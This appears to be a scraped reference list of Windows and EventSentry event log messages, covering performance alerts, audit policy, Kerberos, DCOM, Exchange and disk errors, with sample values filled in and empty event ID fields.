EventSentry
Category:
Performance Monitoring
Message:
The performance counter %1 (instance %2) exceeded the threshold of %3, the current average is %4.


Event ID:
Source:
EventSentry
Message:
The group alert "Performance Warning" was triggered because all performance counters of this group reported an alert the last time they were checked. Please see below for a list of all performance counters and the data last reported:
Low Memory: 120 (17 seconds ago)
High Paging Activity: 250 (0 seconds ago)


Event ID:
Source:
EventSentry
Category:
Performance Monitoring
Message:
One or more required function entry points could not be found in the dynamic link library PDH.DLL. Please make sure that the latest version of PDH.DLL is installed on this machine, for example you may copy the DLL from another machine running a later Operating System. Performance monitoring cannot continue.


Event ID:
Source:
EventSentry
Category:
Performance Monitoring
Message:
The performance counter %1 is back above the threshold of %2, the current average is %3.


Event ID:
Source:
EventSentry
Category:
Performance Monitoring
Message:
The performance counter "%1" (instance "%2") is back above the threshold of %3, the current average is %4.


Event ID:
Source:
EventSentry
Category:
Performance Monitoring
Message:
The performance counter "%1" is back below the threshold of %2, the current average is %3.


Event ID:
Source:
EventSentry
Category:
Performance Monitoring
Message:
The performance counter "Process(*)\% Processor Time" (instance "mysqld-nt") is back below the threshold of 50, the current average is 48.


Event ID:
Source:
EventSentry
Category:
Performance Monitoring
Message:
The performance counter "Process(*)\% Processor Time" (instance "SWEEPSRV.SYS") which previously exceeded the configured threshold, is not available anymore and will not be monitored.


Event ID:
Source:
EventSentry
Category:
TestCategory
Message:
Congratulations! You have just installed and setup up EventSentry (on host BLACKMAMBA), which we believe to be the most efficient and economic event log and system monitoring application on the market.
Please visit http://www.eventsentry.com or http://www.netikus.net/ for more information on EventSentry.
Thank you for using EventSentry.


Event ID:
Source:
EventSentry
Message:
Unable to connect to SMTP host %1 due to error "%2". If you are running McAfee Anti-Virus then make sure that outgoing SMTP traffic is not blocked from this machine (e.g. "Access Protection") and that no firewall is blocking traffic between this host and the mail server.



Event ID:
Source:
EventSentry
Message:
Error during SMTP communication with SMTP host %1. After sending "%2" the following error occurred: %3



Event ID:
Source:
EventSentry
Message:
Unable to connect to SMTP host %1 due to error %2. Will try backup smtp host %3 now.



Event ID:
Source:
EventSentry
Message:
The process notification (target) %1 successfully executed the process "%2".


Event ID:
Source:
EventSentry
Message:
The process notification (target) Laser Printer was unable to execute the process ""cscript.exe" c:\temp\dosprint\eventprint.vbs "Security" "Audit Success" "Security" "Detailed Tracking" 592 "NETIKUSNET\sang.kim" "BULL" "2/22/2006 1:03:33 PM" " " due to error 2.


Event ID:
Source:
EventSentry
Message:
EventSentry was unable to connect to the ODBC target "Test ODBC" due to error "OdbcExpandError: [28000] [Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user 'eventsentry_svc'. (18456)". EventSentry will queue events and continue to attempt the delivery of events.


Event ID:
Source:
EventSentry
Message:
The following error occurred while trying to read the "%1" event log: "%2". In most cases the only way to resolve this problem is to save (if possible) and clear the %1 event log. EventSentry will not be able to monitor the %1 event log until this problem is resolved.



Event ID:
Source:
EventSentry
Message:
Unable to start service because the End User License Agreement was not accepted


Event ID:
Source:
Netlogon
Message:
The session setup from the computer WLBS1 failed to authenticate. The name(s) of the account(s) referenced in the security database is WLBS1$. The following error occurred:
Access is denied.


Event ID:
Source:
EventSentry
Message:
The EventSentry agent has successfully changed the buffer size from %1 bytes to %2 bytes after the Operating System returned the following error: "The data area passed to a system call is too small".



Event ID:
Source:
EventSentry
Message:
The state of service %1 was Stopped, requested state is Running. EventSentry successfully changed the service status to Running.


Event ID:
Source:
EventSentry
Message:
The state of service Spooler is Stopped, requested state is Running. EventSentry was not able to change the service status due to the following error: An instance of the service is already running.


Event ID:
Source:
EventSentry
Message:
The process calc.exe is active.


Event ID:
Source:
EventSentry
Message:
Trend analysis has determined unusual high disk usage on drive %1. The average recorded trend on drive %1 was %2 kb, the current trend was %3 kb, an increase of %4%%.

If this trend change is expected (for example, caused by a daily backup routine) then you will see this message two more times before the pattern is recognized. With the recorded trend, disk space will be exhausted in %5 days, with the current trend in %6 days.


Event ID:
Source:
EventSentry
Message:
Event log filter Test exceeded the configured threshold (3 entries / 300 second(s)). 3 events (out of a total of 8) were dropped by this filter. You can review the dropped events in the event log (if the size of the event log is big enough).


Event ID:
Source:
EventSentry
Message:
Event log filter Test has reached the configured threshold (3 entries / 60 second(s)).



Event ID:
Source:
EventSentry
Message:
Event log filter Test has reached the configured threshold (3 entries / 300 second(s)). Events matching this filter will now be processed.



Event ID:
Source:
EventSentry
Message:
Event log filter Threshold has reached or exceeded the configured threshold (1 entries / 60 second(s)). 5 events were processed during the interval.


Event ID:
Source:
EventSentry
Message:
No event matching filter Backup OK has occurred in the event log in the configured time period. According to the schedule, at least one event matching filter Backup OK should have been logged during the last 420 minutes.



Event ID:
Source:
Browser
Message:
The browser was unable to retrieve a list of servers from the browser master \\DC1-W2K3 on the network \Device\NetBT_Tcpip_631A8496-9308-4979-9849-02D1CAB6CF0A. The data is the error code.



Event ID:
Source:
EventSentry
Message:
EventSentry was unable to query the local audit policy settings. A call to query the current audit policy failed with error %1. Please see the EventSentry documentation for troubleshooting advice on this problem.



Event ID:
Source:
EventSentry
Message:
EventSentry has determined that the currently active Audit Policy does not audit "Process Tracking" and EventSentry is NOT configured to activate "Process Tracking". You will either need to activate Process tracking manually by launching "Start -> Programs -> Administrative Tools -> Local Security Settings -> Local Policies -> Audit Policy -> Audit %3 = Audit Success", activate %2 tracking in Active Directory or configure EventSentry to activate "Process Tracking" for you.


Event ID:
Source:
EventSentry
Message:
EventSentry determined that "Process Tracking" is currently not enabled and was unable to activate it. A call to change the current audit policy failed with error %1. Please see the EventSentry documentation for troubleshooting advice on this problem.


Event ID:
Source:
TermDD
Message:
The RDP protocol component X.224 detected an error in the protocol stream and has disconnected the client.


Event ID:
Source:
LSASRV
Message:
The Security System has received an authentication request that could not be decoded. The request has failed.


Event ID:
Source:
Wins
Message:
WINS received a packet that has the wrong format. For example, a label may be More than 63 octets.


Event ID:
Source:
Wins
Message:
The length of the message sent by another WINS indicates a very big message. There may have been corruption of the data. WINS will ignore this message, terminate the connection with the remote WINS, and continue.


Event ID:
Source:
IAS
Message:
A RADIUS message was received from the invalid RADIUS client IP address 192.168.6.60.


Event ID:
Source:
KDC
Message:
The KDC received invalid messages of type changepassword.


Event ID:
Source:
LSASRV
Message:
An anonymous session connected from 192.168.6.60 has attempted to open an LSA policy handle on this machine. The attempt was rejected with STATUS_ACCESS_DENIED to prevent leaking security sensitive information to the anonymous caller.
The application that made this attempt needs to be fixed. Please contact the application vendor. As a temporary workaround, this security measure can be disabled by setting the \HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\TurnOffAnonymousBlock DWORD value to 1.
This message will be logged at most once a day.


Event ID:
Source:
EventSentry
Message:
EventSentry determined that "Process Tracking" is enabled and data will be now be collected.


Event ID:
Source:
EventSentry
Message:
EventSentry has successfully changed the Audit Policy and has enabled "Process Tracking". Process data will be now be collected.


Event ID:
Source:
EventSentry
Message:
EventSentry determined that "Process Tracking" is currently enabled and was unable to deactivate it. A call to change the current audit policy failed with error %1. Please see the EventSentry documentation for troubleshooting advice on this problem.


Event ID:
Source:
EventSentry
Message:
Process Tracking has been enabled but the "Log Size" properties of the Security event log are not configured properly. In order for Process Tracking to work reliably it is recommended that you reconfigure the security event log (with "Event Viewer") to "Overwrite events as needed".


Event ID:
Source:
EventSentry
Message:
EventSentry has successfully changed the Audit Policy and has disabled "Process Tracking". Process data will no longer be collected.


Event ID:
Source:
EventSentry
Message:
The configured temperature limit of %1 degrees (%3) has been exceeded, the current temperature is %2 degrees (%3).



Event ID:
Source:
EventSentry
Message:
The configured humidity limit of 60% has been exceeded, the current humidity level is 90%.


Event ID:
Source:
EventSentry
Message:
EventSentry was unable to find a temperature and/or humidity sensor on serial port %1. Please make sure the device is connected properly.



Event ID:
Source:
EventSentry
Message:
The database write interval for environment monitoring is set too small. The interval was automatically adjusted to %1 seconds.



Event ID:
Source:
EventSentry
Message:
Unable to open serial port %1 due to error "%2". Environment monitoring will not continue.



Event ID:
Source:
EventSentry
Message:
The temperature has fallen below the configured limit of %1 degrees (%3). The current temperature is %2 degrees (%3).



Event ID:
Source:
EventSentry
Message:
The humidity level has fallen below the configured limit of %1%. The current humidity level is %2%%.



Event ID:
Source:
EventSentry
Message:
The current temperature has fallen outside the configured range (%1%4 to %2%4). The current temperature is %3 degrees (%4).



Event ID:
Source:
EventSentry
Message:
The current humidity level has fallen outside the configured range (%1%% to %2%%). The current humidity level is %3%%.



Event ID:
Source:
EventSentry
Message:
The temperature (78.96 degrees F) is back in the configured range (60F to 78F)


Event ID:
Source:
EventSentry
Message:
The current humidity level is back in the configured range (10% to 70%). The current humidity level is 15%.


Event ID:
Source:
Security
Message:
Change Password Attempt:
Target Account Name: ingmar
Target Domain: NETIKUS
Target Account ID: NETIKUS\ingmar
Caller User Name: ingmar
Caller Domain: NETIKUS
Caller Logon ID: (0x0,0xA467822)
Privileges: -



Event ID:
Source:
KDC
Message:
The currently selected KDC certificate was once valid, but now is invalid and no suitable replacement was found. Smartcard logon may not function correctly if this problem is not remedied. Have the system administrator check on the state of the domain's public key infrastructure. The chain status is in the error data.


Event ID:
Source:
Kerberos
Message:
The kerberos client received a KRB_AP_ERR_TKT_NYV error from the server TEST-W2K$. This indicates that the ticket used against that server is not yet valid (in relationship to that server time). Contact your system administrator to make sure the client and server times are in sync, and that the KDC in realm TESTGROUND.LOCAL is in sync with the KDC in the client realm.


Event ID:
Source:
Windows Update Agent
Message:
Installation Failure: Windows failed to install the following update with error 0x80070643: Security Update for Flash Player (KB913433).


Event ID:
Source:
DhcpServer
Message:
The DHCP/BINL service on this Small Business Server has encountered another server on this network with IP Address, 10.10.10.1, belonging to the domain: .


Event ID:
Source:
DhcpServer
Message:
The DHCP/BINL service on this computer is shutting down. See the previous event log messages for reasons.


Event ID:
Source:
AutoEnrollment
Message:
Automatic certificate enrollment for local system failed to enroll for one Directory Email Replication certificate (0x80070005). Access is denied.




Event ID:
Source:
Ntfs
Message:
A user hit their quota limit on volume C:.



Event ID:
Source:
Backup Exec
Message:
Backup Exec Alert: Job Failed(Server: 'CWBAPP01') (Job: 'SQL SERVER DAILY - FULL') SQL SERVER DAILY - FULL -- The job failed with the following error: A failure occurred querying the Writer status. For more information, click the following link: http://eventlookup.veritas.com/eventlookup/EventLookup.jhtml


Event ID:
Source:
Perflib
Message:
The timeout waiting for the performance data collection function "ABC" in the "C:\WINNT\system32\perf.dll" Library to finish has expired. There may be a problem with this extensible counter or the service it is collecting data from or the system may have been very busy when this call was attempted.


Event ID:
Source:
Windows Update Agent
Category:
Installation
Message:
Installation Failure: Windows failed to install the following update with error 0x80070003: Security Update for Windows XP (KB873339).


Event ID:
Source:
ESE
Category:
Logging/Recovery
Message:
Information Store (324) First Storage Group: The backup has been stopped because it was halted by the client or the connection with the client failed.


Event ID:
Source:
DCOM
Message:
DCOM got error "The service cannot be started, either because it is disabled or because it has no enabled devices associated with it. " attempting to start the service IISADMIN with arguments "" in order to run the server:
{A9E69610-B80D-11D0-B9B9-00A0C922E750}


Event ID:
Source:
Security
Message:
Type: Success Audit

Description: Windows NT is shutting down.
All logon sessions will be terminated by this shutdown.


Event ID:
Source:
Security
Message:
Type: Success Audit
Windows is starting up


Event ID:
Source:
DCOM
Message:
DCOM was unable to communicate with the computer 192.168.x.xx using any of the configured protocols.


Event ID:
Source:
Userenv
Message:
Windows cannot determine the user or computer name. (The specified user does not exist.). Group Policy processing aborted.


Event ID:
Source:
SQLAgent
Category:
Alert Engine
Message:
Unable to read local eventlog (reason: The data area passed to a system call is too small).


Event ID:
Source:
Security
Message:
Scheduled Task created:
File Name: C:\WINDOWS\Tasks\Calculator.job
Command: C:\WINDOWS\system32\calc.exe
Triggers: At 11:48 AM every day, starting 11/14/2006.
Time: 11/14/2006 11:48:00 AM
Flags: 0x18000C0
Target User: EVENTSENTRY\User1
By:
User: User1
Domain: EVENTSENTRY
Logon ID: (0x0,0x127F30A0)


Event ID:
Source:
VolSnap
Message:
The shadow copies of volume C: were deleted because the shadow copy storage could not grow in time. Consider reducing the IO load on the system or choose a shadow copy storage volume that is not being shadow copied.


Event ID:
Source:
Security
Category:
Logon/Logoff
Message:
Logon Failure:
Reason: An error occurred during logon
User Name: TheUser
Domain: TheDomain
Logon Type: 11
Logon Process: User32
Authentication Package: Negotiate
Workstation Name: WORKSTATION01
Status code: 0xC000005E
Substatus code: 0x0


Event ID:
Source:
Security
Category:
Account Logon
Message:
Authentication Ticket Request:
User Name: computer$
Supplied Realm Name: DOMAIN.LOCAL
User ID: -
Service Name: krbtgt/DOMAIN.LOCAL
Service ID: -
Ticket Options: 0x40810010
Result Code: 0x6
Ticket Encryption Type: -
Pre-Authentication Type: -
Client Address: 192.168.1.122
Certificate Issuer Name:
Certificate Serial Number:
Certificate Thumbprint:


Event ID:
Source:
MRxSmb
Category:
None
Message:
The master browser has received a server announcement from the computer NT29 that believes that it is the master browser for the domain on transport NetBT_Tcpip_{492C50E8-6A5F-48B9-BA. The master browser is stopping or an election is being forced.


Event ID:
Source:
EFS
Message:
EFS does not support encryption over network sessions established using the NTLM protocol.


Event ID:
Source:
POP3SVC
Message:
DS lookup for user USERNAME, connecting from 192.168.1.1, failed with error 0x80040920.


Event ID:
Source:
MSExchangeIS
Category:
General
Message:
The mailbox for /o=First Organization/ou=first administrative group/cn=Recipients/cn=USERNAME has exceeded the maximum mailbox size. This mailbox cannot send or receive messages. Incoming messages to this mailbox are returned to sender. The mailbox owner should be notified about the condition of the mailbox as soon as possible.


Event ID:
Source:
TermServDevices
Message:
Driver Lexmark W812 required for printer !!Shmata!Lexmark W812 is unknown. Contact the administrator to install the driver before you log in again.



Event ID:
Source:
Server ActiveSync
Message:
Unexpected Exchange mailbox Server error: Server: [EXCHANGE.yourdomain.local] User: [youruser@yourdomain.com] HTTP status code: [409]. Verify that the Exchange mailbox Server is working correctly.


Event ID:
Source:
Perflib
Message:
The Open Procedure for service "ASP.NET_2.0.50727" in DLL "C:\WINNT\Microsoft.NET\Framework\v2.0.50727\aspnet_perf.dll" failed. Performance data for this service will not be available. Status code returned is data DWORD 0.



Event ID:
Source:
Application Error
Message:
Faulting application iexplore.exe, version 7.0.5730.11, faulting module flash9b.ocx, version 9.0.28.0, fault address 0x00072826.


Event ID:
Source:
WinVNC4
Message:
Connections: blacklisted: xx.xx.xx.xx


Event ID:
Source:
WinMgmt
Message:
WMI ADAP was unable to retrieve data from the PerfLib subkey: %1, error code: %2


Event ID:
Source:
Print
Message:
Printer %1 was set


Event ID:
Source:
yukonwxp
Message:
Driver has encountered an internal error.


Event ID:
Source:
MsiInstaller
Message:
Product: Microsoft Visual Studio 2005 Premier Partner Edition - ENU -- Error 1718.File C:\WINDOWS\Installer\236249.msp did not pass the digital signature check. For more information about a possible resolution for this problem, see http://go.microsoft.com/fwlink/?LinkId=73863.


Event ID:
Source:
MsiInstaller
Message:
The installation of C:\WINDOWS\Installer\236249.msp is not permitted due to an error in software restriction policy processing. The object cannot be trusted.


Event ID:
Source:
Windows Update Agent
Category:
Installation
Message:
Installation Failure: Windows failed to install the following update with error 0x80070643: Visual Studio 2005 Service Pack 1.


Event ID:
Source:
VSS
Message:
Volume Shadow Copy Service error: Unexpected error calling routine CoCreateInstance. hr = 0x80040154.


Event ID:
Source:
Disk
Message:
The device, \Device\Harddisk0\D, has a bad block.


Event ID:
Source:
Schannel
Message:
The certificate received from the remote server was issued by an untrusted certificate authority. Because of this, none of the data contained in the certificate can be validated. The SSL connection request has failed. The attached data contains the server certificate.


Event ID:
Source:
DNS
Message:
A zone transfer request for the secondary zone somedomain.local was refused by the master DNS server at 1.2.3.4. Check the zone at the master server 1.2.3.4 to verify that zone transfer is enabled to this server. To do so, use the DNS console, and select master server 1.2.3.4 as the applicable server, then in secondary zone somedomain.local Properties, view the settings on the Zone Transfers tab. Based on the settings you choose, make any configuration adjustments there (or possibly in the Name Servers tab) so that a zone transfer can be made to this server.


Event ID:
Source:
MSExchangeIS Mailbox Store
Category:
MTA Connections
Message:
Verify that the Microsoft Exchange MTA service has started. Consecutive ma-open calls are failing with error 3051.


Event ID:
Source:
PlugPlayManager
Category:
System
Message:
The device Root\LEGACY_ERASERUTILDRV10710\0000 disappeared from the system without first being prepared for removal.


Event ID:
Source:
Office Server Search
Category:
Gatherer
Message:
The start address <http://xxx> cannot be crawled.
Context: Application 'ABC', Catalog 'Portal_Content'
Details:
Element not found.
(0x8002802b)



Event ID:
Source:
EventSystem
Category:
Firing Agent
Message:
The COM+ Event System failed to create an instance of the subscriber 58FC39EB-9DBD-4EA7-B7B4-9404CC6ACFAB. StandardCreateInstance returned HRESULT 8000401A.


Event ID:
Source:
MRxSmb
Message:
The redirector failed to determine the connection type.


Event ID:
Source:
Security
Category:
Account Logon
Message:
Type: Failure Audit
Source: Security
Event Category: Account Logon
Event ID: 677
User: NT AUTHORITY\SYSTEM
Description: Service Ticket Request Failed:
User Name: UserName
User Domain: DomainName
Service Name: ServiceName
Ticket Options: 0x40830000
Failure Code: 0xE
Client Address: IPAddress


Event ID:
Source:
DCOM
Category:
None
Message:
Event message 1

Event Type: Error
Event Source: DCOM
Event Category: None
Event ID: 10021
Date: Date
Time: Time
User: N/A
Computer: SMS SERVER
Description:
The launch and activation security descriptor for the COM Server application with CLSID {61738644-F196-11D0-9953-00C04FD919C1}. is invalid. It contains Access Control Entries with permissions that are invalid. The requested action was therefore not performed. This security permission can be corrected using the Component Services administrative tool.


Event message 2

Event Type: Error
Event Source: DCOM
Event Category: None
Event ID: 10016
Date: Date
Time: Time
User: NT AUTHORITY\SYSTEM
Computer: SMSSERVER
Description:
The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID {05D1D5D8-18D1-4B83-85ED-A0F99D53C885} to the user NT AUTHORITY\SYSTEM SID (S-1-5-18). This security permission can be modified using the Component Services administrative tool.




Event ID:
Source:
Microsoft Fax
Category:
Initialization/Termination
Message:
Event Type: Warning
Event Source: Microsoft Fax
Event Category: Initialization/Termination
Event ID: 32026
Date: 16/11/2005
Time: 05:40:54
User: N/A
Computer: HOUSINGXP
Description:
Fax Service failed to initialize any assigned fax devices (virtual or
TAPI). No faxes can be sent or received until a fax device is
installed.



Event ID:
Source:
SQLAgent$SHAREPOINT
Category:
Alert Engine
Message:
SQLAgent is not allowed to run.


Event ID:
Source:
WinVNC4
Message:
SConnection: AuthFailureException: Authentication failure


Event ID:
Source:
NTDS Replication
Category:
Backup
Message:
This directory partition has not been backed up since at least the following number of days.

Directory partition:
DC=testdcgrnd,DC=local

'Backup latency interval' (days):
90

It is recommended that you take a backup as often as possible to recover from accidental loss of data. However if you haven't taken a backup since at least the 'backup latency interval' number of days, this message will be logged every day until a backup is taken. You can take a backup of any replica that holds this partition.

By default the 'Backup latency interval' is set to half the 'Tombstone Lifetime Interval'. If you want to change the default 'Backup latency interval', you could do so by adding the following registry key.

'Backup latency interval' (days) registry key:
System\CurrentControlSet\Services\NTDS\Parameters\Backup Latency Threshold (days)



Event ID:
Source:
Server Administrator
Category:
Storage Service
Message:
Virtual disk degraded: Virtual Disk 1 (Virtual Disk 1) Controller 0 (PERC 5/i Integrated)


Event ID:
Source:
Server Administrator
Category:
Storage Service
Message:
Physical disk removed: Physical Disk 0:0:0 Controller 0, Connector 0


Event ID:
Source:
Software Installation
Message:
Software Installation encountered an unexpected error while reading from the MSI file \\server\Software\Firefox\Firefox-2.0.0.4-en-US.msi. The error was not serious enough to justify halting the operation. The following error was encountered: The operation completed successfully.


Event ID:
Source:
MSExchangeTransport
Category:
Connection Manager
Message:
Message delivery to the remote domain 'somedomain.com' failed for the following reason: Unable to bind to the destination server in DNS.


Event ID:
Source:
Disk
Message:
The driver detected that the device \Device\Harddisk0\DR0 has its write cache enabled. Data corruption may occur.


Event ID:
Source:
W32Time
Message:
The time service has not been able to synchronize the system time for 49152 seconds because none of the time providers has been able to provide a usable time stamp. The system clock is unsynchronized.

For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.


Event ID:
Source:
Userenv
Message:
Windows cannot obtain the domain controller name for your computer network. (A socket operation was attempted to an unreachable host. ). Group Policy processing aborted.


Event ID:
Source:
MetaFrameEvents
Category:
Printer Management
Message:
An error occured while retrieving client printer properties. Default printer properties will be used instead. Client name: () Printer: (Client/hostname#/printername) Printer driver: (Citrix Universal Printer)


Event ID:
Source:
Security
Category:
Detailed Tracking
Message:
The Windows Firewall has detected an application listening for incoming traffic.

Name: -
Path: C:\WINDOWS\system32\eventsentry_svc.exe
Process identifier: 4840
User account: es_svc
User domain: DMN
Service: Yes
RPC server: No
IP version: IPv4
IP protocol: UDP
Port number: 2594
Allowed: No
User notified: No


Event ID:
Source:
MSExchangeTransport
Message:
Failed in reading Connector's DS Info Process Id: 1100 Process location: C:\WINNT\System32\inetsrv\inetinfo.exe ConnectorDN: CN=External Mail,CN=Connections,CN=First Routing Group,CN=Routing Groups,CN=First Administrative Group,CN=Administrative Groups,CN=APM,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=ad,DC=apm,DC=net,DC=au Hr:80040920 Attribute:[]


Event ID:
Source:
Application Hang
Message:
Fault bucket 431401983.


Event ID:
Source:
Backup Exec
Message:
An error occurred while attempting to log in to the following server: "SERVER04\DMD_SERVER".
SQL error number: "4818".
SQL error message: "Login failed for user 'WSM1\Administrator'.
".



Event ID:
Source:
MetaFrameEvents
Message:
Client printer auto-creation failed. The driver could not be installed. Possible reasons for the failure: The driver is not in the list of drivers on the server. The driver cannot be located. The driver has not been mapped. Client name: (CALPC01445) Printer: (HP LaserJet 1020 (from CALPC01445) in session 33) Printer driver: (HP LaserJet 1020)


Event ID:
Source:
Perflib
Message:
The Open Procedure for service 'ScanMail_Monitor' in DLL 'C:\WINNT\system32\SmxPerf.dll' failed. Performance data for this service will not be available. Status code returned is data DWORD 0.


Event ID:
Source:
NGen
Message:
Event from Fault: NT Log Monitor[0] : Event from NT System Log[TermServDevices] , Event: ID= 1111, Description: Driver SHARP AR-M277 PCL5e required for printer !!YOWOTTSRV007!OttSharpARM27701 is unknown. Contact the administrator to install the driver before you log in again.


Event ID:
Source:
Perflib
Message:
The Open Procedure for service 'AppleTalk' in DLL 'C:\WINNT\system32\atkctrs.dll' failed. Performance data for this service will not be available. Status code returned is data DWORD 0.


Event ID:
Source:
MetaFrameEvents
Message:
Client printer auto-creation failed. The driver could not be installed. Possible reasons for the failure: The driver is not in the list of drivers on the server. The driver cannot be located. The driver has not been mapped. Client name: (YYZCHOSRVxxx) Printer: (CutePDF Writer (from YYZCHOSRVxxx) in session 112) Printer driver: (CutePDF Writer)


Event ID:
Source:
Browser
Message:
The browser service has failed to retrieve the backup list too many times on transport \Device\NetBT_Tcpip_6ADE6448-65A6-49CA-B8F8-686CE64294DC. The backup browser is stopping.


Event ID:
Source:
Domain Time Server
Message:
Another process has changed the clock rate from 156251/156250 to 156252/156250)


Event ID:
Source:
.NET Runtime
Message:
Unable to open shim database version registry key - v2.0.50727.00000



Event ID:
Source:
Userenv
Message:
Windows has detected that Offline Caching is enabled on the Roaming Profile share - to avoid potential profile corruption, Offline Caching must be disabled on shares where roaming user profiles are stored.


Event ID:
Source:
SceCli
Message:
Security policies were propagated with warning. 0x4b8 : An extended error has occurred.

For best results in resolving this event, log on with a non-administrative account and search http://support.microsoft.com for "Troubleshooting Event 1202's".


Event ID:
Source:
Removable Storage Service
Message:
RSM could not load media in drive Drive 0 of library Iomega RRD2.


Event ID:
Source:
Print
Message:
Printer Driver HP Color LaserJet 2605dn_2605dtn PCL 6 for Windows NT x86 Version-3 was added or updated. Files:- UNIDRV.DLL, UNIDRVUI.DLL, HPC260d6.GPD, UNIDRV.HLP, hpzsc053.dtd, hpzst053.dll, hpc260d6.xml, hpc260dc.ini, hpzpp053.dll, hpzui053.dll, hpz6r053.dll, hpcdmc32.dll, hpbcfgre.dll, hpz6m053.gpd, hpzsm053.gpd, HPC260x6.GPD, hpzev053.dll, pclxl.dll, pjl.gpd, p6disp.gpd, pclxl.gpd, HPZHL053.CAB, STDNAMES.GPD, hpzls053.dll, hpzss053.dll, UNIRES.DLL.


Event ID:
Source:
PDEngine
Message:
Unable to move file E:\System Volume Information\20d5a57d-4de1-11dc-a8af-00101815f0e6{3808876b-c176-4e48-b7ae-04046e6cc752} after many attempts. Skipping file.


Event ID:
Source:
USER32
Message:
The process winlogon.exe has initiated the restart of PANTHER for the following reason: No title for this reason could be found
Minor Reason: 0xff
Shutdown Type: shutdown
Comment: The EventSentry agent is performing a shutdown/reboot of this computer.



Event ID:
Source:
Service Control Manager
Message:
The ABC service was unable to log on as DOMAIN\service.account with the currently configured password due to the following error:
Logon failure: unknown user name or bad password.

To ensure that the service is configured properly, use the Services snap-in in Microsoft Management Console (MMC).


Event ID:
Source:
Security
Message:
User Account password set:
Target Account Name: QA
Target Domain: WESTELL
Target Account ID: WESTELL\QA
Caller User Name: JHINT
Caller Domain: WESTELL
Caller Logon ID: (0x0,0x8F1A7AB5)


Event ID:
Source:
DNS
Message:
The DNS server encountered an invalid domain name in a packet from 128.252.19.21. The packet will be rejected. The event data contains the DNS packet.


Event ID:
Source:
Server Administrator
Message:
Controller log file entry: VD 00/0 is now OPTIMAL: Virtual Disk 0 (Virtual Disk 0) Controller 0 (PERC 5/i Integrated)


Event ID:
Source:
Server Administrator
Message:
Redundancy lost: Virtual Disk 0 (Virtual Disk 0) Controller 0 (PERC 5/i Integrated)


Event ID:
Source:
Server Administrator
Message:
Device failed: Physical Disk 1:0:9 Controller 0, Connector 1


Event ID:
Source:
Server Administrator
Message:
Virtual disk degraded: Virtual Disk 0 (Virtual Disk 0) Controller 0 (PERC 5/i Integrated)


Event ID:
Source:
Print
Message:
Document 19, Name Of The Document Would Be Here owned by domainuser was printed on HP LaserJet 2420d via port IP_192.162.2.29. Size in bytes: 0; pages printed: 1


Event ID:
Source:
Print
Message:
The document Name Of The Document Would Be Here owned by domainuser failed to print on printer HP LaserJet 2420d. Data type: NT EMF 1.008. Size of the spool file in bytes: 191336. Number of bytes printed: 0. Total number of pages in the document: 1. Number of pages printed: 0. Client machine: \\192.168.3.251. Win32 error code returned by the print processor: 0. The operation completed successfully.


Event ID:
Source:
W32Time
Message:
The time service has detected that the system time needs to be changed by -2591998 seconds. The time service will not change the system time by more than -54000 seconds. Verify that your time and time zone are correct, and that the time source xxxx.xxxx.xxx (ntp.d|xx.xx.xx.xx:123->xx.xx.xx.xx:123) is working properly.



Event ID:
Source:
MSExchangeIS Mailbox Store
Category:
General
Message:
Exchange store 'First Storage Group\Mailbox Store (SERVER)': The logical size of this database (the logical size equals the physical size of the .edb file and the .stm file minus the logical free space in each) is 16 GB. This database size is approaching the size limit of 18 GB.

If the logical database size exceeds the maximum size limit, it will be dismounted on a regular basis.

For more information, click http://www.microsoft.com/contentredirect.asp.



Event ID:
Source:
NetRAID.Log
Message:
Adapter 0 Channel 0 Target 2: Media Error Count=1, Other Error Count=0


Event ID:
Source:
MSExchangeSA
Message:
OALGen will skip user entry '@ I-Tek GM-TIS Prod TivTalk' in address list '\Global Address List' because the SMTP address '' is invalid. - Default Offline Address List For more information, click http://www.microsoft.com/contentredirect.asp.


Event ID:
Source:
MSSQLSERVER
Message:
Login failed for user 'sa'. The user is not associated with a trusted SQL Server connection. [CLIENT: 202.98.221.121]



Event ID:
Source:
Userenv
Message:
Windows cannot read the history of GPOs from the registry. Continuing Group Policy Processing.


Event ID:
Source:
USER32
Message:
The reason supplied by user SORTRITE\Craig McWilliams for the last unexpected shutdown of this computer is: Other (Unplanned)
Reason Code: 0xa000000
Bug ID:
Bugcheck String:
Comment: Do not know -- Craig.



Event ID:
Source:
MetaFrame
Message:
Auto Client Reconnect attempted but failed due to incorrect cookie data. NOTE: If this error occurs frequently it may indicate an attempt to gain unauthorized access to the system.



Event ID:
Source:
Userenv
Message:
Windows cannot determine the user or computer name. (Access is denied. ). Group Policy processing aborted.



Event ID:
Source:
NetBT
Message:
A duplicate name has been detected on the TCP network. The IP address of the machine that sent the message is in the data. Use nbtstat -n in a command window to see which name is in the Conflict state.


Event ID:
Source:
DCOM
Message:
DCOM got error '58' attempting to start the service StiSvc with arguments '' in order to run the server:A1F4E726-8CF1-11D1-BF92-0060081ED811


Event ID:
Source:
Security
Category:
Account Logon
Message:
Pre-authentication failed:
User Name: WIN2008$
User ID: TESTGROUND\WIN2008$
Service Name: krbtgt/TESTGROUND.LOCAL
Pre-Authentication Type: 0x0
Failure Code: 0x19
Client Address: 192.138.23.31


Event ID:
Source:
NTDS Replication
Message:
This directory partition has not been backed up since at least the following number of days. Directory partition: DC=BarrettHospital,DC=local 'Backup latency interval' (days): 30 It is recommended that you take a backup as often as possible to recover from accidental loss of data. However if you haven't taken a backup since at least the 'backup latency interval' number of days, this message will be logged every day until a backup is taken. You can take a backup of any replica that holds this partition. By default the 'Backup latency interval' is set to half the 'Tombstone Lifetime Interval'. If you want to change the default 'Backup latency interval', you could do so by adding the following registry key. 'Backup latency interval' (days) registry key: System\CurrentControlSet\Services\NTDS\Parameters\Backup Latency Threshold (days)


Event ID:
Source:
Kerberos
Message:
A Kerberos Error Message was received:
on logon session
Client Time:
Server Time: 13:37:37.0000 12/14/2007 Z
Error Code: 0x34 KRB_ERR_RESPONSE_TOO_BIG
Extended Error:
Client Realm:
Client Name:
Server Realm: KDOMAIN.COM
Server Name: host/kap.kdomain.com
Target Name: host/kap.kdomain.com@KDOMAIN.COM
Error Text:
File: 9
Line: ae0
Error Data is in record data.



Event ID:
Source:
Kerberos
Message:
A Kerberos Error Message was received:
on logon session
Client Time:
Server Time: 13:34:51.0000 12/14/2007 Z
Error Code: 0xd KDC_ERR_BADOPTION
Extended Error: 0xc00000bb KLIN(0)
